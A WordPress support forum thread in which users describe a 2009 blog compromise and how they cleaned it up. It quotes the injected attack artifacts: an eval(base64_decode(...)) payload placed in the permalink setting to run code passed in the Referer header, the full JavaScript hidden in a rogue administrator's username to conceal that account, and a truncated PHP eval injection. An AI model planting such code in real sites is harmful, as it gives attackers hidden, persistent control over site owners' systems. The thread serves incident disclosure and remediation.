WordPress.org

Support

Support » How-To and Troubleshooting » [Resolved] eval(base64_decode(…)) in permalinks

[Resolved] eval(base64_decode(…)) in permalinks

  • benanne
    Member

    @benanne

    I figure my blog got hacked. It’s my own fault for being too lazy to upgrade, but I thought I’d describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

    Since this morning, I noticed that my “permalinks” setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

    When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called “JohnFisher76” also had admin rights. I’d had a few spam registrations before so I hadn’t paid attention to this. I wish I had…

    This user’s username was… a bit weird. It looked like this:

    ...
    
    <div id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
    	try{
    		var t=document.getElementById("user_superuser");
    		while(t.nodeName!="TR"){
    			t=t.parentNode;
    		};
    		t.parentNode.removeChild(t);
    		var tags = document.getElementsByTagName("H3");
    		var s = " shown below";
    		for (var i = 0; i < tags.length; i++) {
    			var t=tags[i].innerHTML;
    			var h=tags[i];
    			if(t.indexOf(s)>0){
    				s =(parseInt(t)-1)+s;
    				h.removeChild(h.firstChild);
    				t = document.createTextNode(s);
    				h.appendChild(t);
    			}
    		}
    		var arr=document.getElementsByTagName("ul");
    		for(var i in arr) if(arr[i].className=="subsubsub"){
    			var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
    			if(n[1]>0){
    				var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
            arr[i].innerHTML=txt;
            }
        }
              }catch(e){};
         };
         addLoadEvent(setUserName);
    </script></div>

    I haven’t bothered to try and interpret what this does, but I guess it’s used to hide the fact that there is another administrator in the admin panel. I don’t know how this user managed to acquire admin rights though.

    Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that’s fixed it. I hope this thing hasn’t left anything else behind that could come back to haunt me…

Viewing 12 replies - 1 through 12 (of 12 total)
  • riis
    Member

    @riis

    Hi

    I’ve experienced the same thing today. I visited my site yesterday and everything was fine. Today everything is messed up. How did you get rid of the permalink problems?

    Thanks!

    benanne
    Member

    @benanne

    I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don’t think that had any effect.

    At any rate it can’t hurt to search the “options” table for any reference to “eval” or “base64” and clean that up. It also appeared in a row in “options” called “rewrite_rules”, I think. But that disappeared once I changed the setting back.

    As I said, I don’t know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.

    lexthoonen
    Member

    @lexthoonen

    Check this thread:
    http://wordpress.org/support/topic/307518

    and upgrade wordpress

    benanne
    Member

    @benanne

    Thanks, that is indeed exactly the same problem as the one I had. Maybe the extra information about the rogue user with administrator rights is still interesting, though.

    jekket
    Member

    @jekket

    i`ve just clean this stuff in “permalinks” and change my admin password.

    all works.

    P.S. Do backups – it saves your time

    benanne
    Member

    @benanne

    If I were you, I would check my user list to see if there are any admins in there that shouldn’t be there…

    Roy
    Member

    @gangleri

    Thread number three
    http://wordpress.org/support/topic/307518?replies=15
    http://wordpress.org/support/topic/297639

    It seems that this already started a couple of weeks ago, judging the oldest thread. Some automatic attack I guess.

    chabotjeff
    Member

    @chabotjeff

    My site got nailed too. I didn’t think of anything when I had a couple “admin” users added to the site. Thought it was just spam. But I had two additional “admins” with “contributer” status and they were able to change the Permalinks url structure. Argghh.

    problem solved … http://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/

    in wp_options table, clear the row named _transient_rewrite_rules and set permailink from wp config again !!!

    check all your dababase for infection:

    from ssh , use grep and search for particular strings in all database from server :

    grep -H -r “eval(base64_decode” /var/lib/mysql
        grep -H -r “var setUserName = function” /var/lib/mysql

    have a nice day …

    jremillard
    Member

    @jremillard

    Well, happy? to say that its not your fault!

    the hacks are coming from lower layers than WP itself, we suspect the the OS’s themselves are cracked.

    frankly, the only ‘real’ way to monitor and know if you have been hacked would be to monitor for malware, which we offer for free at: http://www.sitesecuritymonitor.com

    We also offer a free WP security plugin, to lockdown all versions of wordpress. This works in 98% of the cases (download here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ) – however in this case, if you are hosted w/ godaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution) – the plugin wouldn’t help much

    🙁

    3stripe
    Participant

    @3stripe

    I have a similar problem on Dreamhost, all of my WP files have been injected with this at the start:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f.... etc

    @jremillard, do you think I’m being hacked via WordPress, or some other way?

    So sick of this happening 🙁

    Thanks.

    James Huff
    Support Team Rep.

    @macmanx

    The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent “in the clear” via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you’re on a PC or Cyberduck if you’re on a Mac.

    To clean out the current hack, carefully follow this guide:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

Viewing 12 replies - 1 through 12 (of 12 total)
  • The topic ‘[Resolved] eval(base64_decode(…)) in permalinks’ is closed to new replies.